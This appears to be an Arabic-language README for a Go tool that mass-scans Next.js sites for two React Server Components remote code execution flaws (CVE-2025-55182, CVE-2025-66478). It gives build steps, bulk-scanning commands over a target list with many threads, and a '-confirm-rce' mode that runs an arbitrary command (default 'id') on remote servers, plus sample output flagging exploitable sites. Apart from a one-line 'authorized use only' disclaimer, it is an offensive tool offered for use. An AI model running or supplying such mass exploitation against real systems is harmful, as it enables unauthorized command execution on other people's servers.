
ماسح سريع لاكتشاف وتأكيد ثغرات RCE في Next.js (CVE-2025-55182 و CVE-2025-66478).
ماسح ضعف سريع لـ CVE-2025-55182 و CVE-2025-66478 في تطبيقات Next.js التي تستخدم React Server Components. يدعم المسح الجماعي، وتأكيد تنفيذ الأوامر عن بعد (RCE)، وفحوصات متزامنة عالية الأداء.
git clone https://github.com/cypholab/evilact.git
cd evilact
go build -o scanner main.go
# رابط واحد
./scanner -url https://target.com
# روابط متعددة من ملف
./scanner -file targets.txt
# مع تأكيد تنفيذ الأوامر عن بعد
./scanner -url https://target.com -confirm-rce
# مسح سريع بـ 50 خيطاً
./scanner -file targets.txt -threads 50
-url رابط الهدف الواحد
-file ملف يحتوي على الروابط (رابط في كل سطر)
-c الأمر المطلوب تنفيذه (الافتراضي: id)
-threads عدد الخيوط (الافتراضي: 10)
-confirm-rce تأكيد تنفيذ الأوامر عن بعد
-check-only وضع الفحص الآمن
-v إخراج مفصل
-t المهلة بالثواني (الافتراضي: 10)
./scanner -file targets.txt -threads 20 -confirm-rce
[SCANNER] تم تحميل 100 رابط
[SCANNER] [ضعيف + تأكيد RCE] https://site1.com - الحالة: 303 (0.18ث)
[SCANNER] [غير ضعيف] https://site2.com - الحالة: 200 (0.15ث)
تم مسح 100 هدف: 5 ضعيف، 5 تأكيد RCE، 95 آمن، 0 خطأ
الأهداف الضعيفة:
- https://site1.com [تأكيد RCE]
- https://site3.com [تأكيد RCE]
للاستخدام المصرح به فقط. يُمنع الاستخدام غير القانوني.